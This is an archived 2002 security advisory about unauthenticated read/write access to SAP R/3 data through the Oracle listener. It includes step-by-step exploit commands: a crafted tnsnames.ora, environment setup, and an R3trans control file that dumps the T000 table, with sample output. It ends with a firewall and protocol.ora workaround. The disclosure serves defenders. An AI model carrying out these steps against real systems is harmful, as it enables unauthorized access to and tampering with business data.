Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Oracle :: orac5317.htm

SAP R/3 spoofing via database listener



30th Apr 2002 [SBWID-5317]
COMMAND

	SAP R/3 spoofing via database listener

SYSTEMS AFFECTED

	All R/3 Releases using SQL*net V2 (3.x, 4.x, 6.10)

PROBLEM

	From Jochen Hein [jochen@jochen.org] announcement :
	

	Every user having network access to the  oracle  listener  port  on  the
	database host may read/write/modify any SAP data.
	

	 Exploit :

	 =======

	

	Needed knowledge: IP address (and port) of the  database  host  and  the
	System ID (SID).  You  may  get  them  with  a  packet  sniffer,  social
	engineering or just running sapinfo against a running SAP  R/3.  sapinfo
	also tells you the R/3 release, which we\'ll need  (we  use  R3trans  of
	that release.
	

	With these informations an attacker can  create  a  local  user  sidadm,
	craft a tnsnames.ora and an environment for running R3trans.
	

	  SID.world =

	  (DESCRIPTION =

	    (ADDRESS_LIST =

	        (ADDRESS =

	          (COMMUNITY = sap.world)

	          (PROTOCOL = TCP)

	          (Host = hostname)

	          (Port = 1527)

	        )

	    )

	    (CONNECT_DATA =

	       (SID = SID)

	       (GLOBAL_NAME = SID.world)

	    )

	  )

	

	And running the commands (note you need the R3trans from the target  R/3
	release):
	

	sidadm> export TNS_ADMIN=$HOME/

	sidadm> export ORACLE_HOME=/oracle/SID

	sidadm> export ORACLE_SID=SID

	sidadm> export PATH=\"$PATH:/oracle/SID/817_32/bin:/usr/sap/SID/SYS/exe/run\"

	sidadm> export dbms_type=oraexport DIR_LIBRARY=/usr/sap/SID/SYS/exe/run

	sidadm> export dbs_ora_tnsname=SID

	sidadm> export TNS_ADMIN=/home/sidadm

	sidadm> cat control

	export

	compress=no

	client=000

	# select table where name = T000

	select * from t000

	sidadm> R3trans control

	...

	sidadm> strings trans.dat

	...

	q  000SAP AG             Walldorf               DEM [...]

	q  001Auslieferungsmandant R11 Kundstadt        EUR [...]

	...

	

	

	Any user on the  local  network  can  access  any  SAP  data  read/write
	without password. No SAP authority checks are applied.
	

	...
	

	 References :

	 ==========

	

	A complete exploit and more remarks are (in German) [2]here.
	

	OSS note 186119.
	

	 1. http://www.sap.com/

	 2. http://www.lan-ks.de/~jochen/sap-r3/ora-hack.html

	 3. mailto:jochen@jochen.org

	

SOLUTION

	Workaround is to restrict access to the Oracle port either with  network
	means (a firewall) or using the following protocol.ora  options  on  the
	database server:
	

	tcp.nodelay = true

	tcp.validnode_checking = yes

	tcp.invited_nodes = ( hostname, hostname )

	

	

	There is no patch available.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH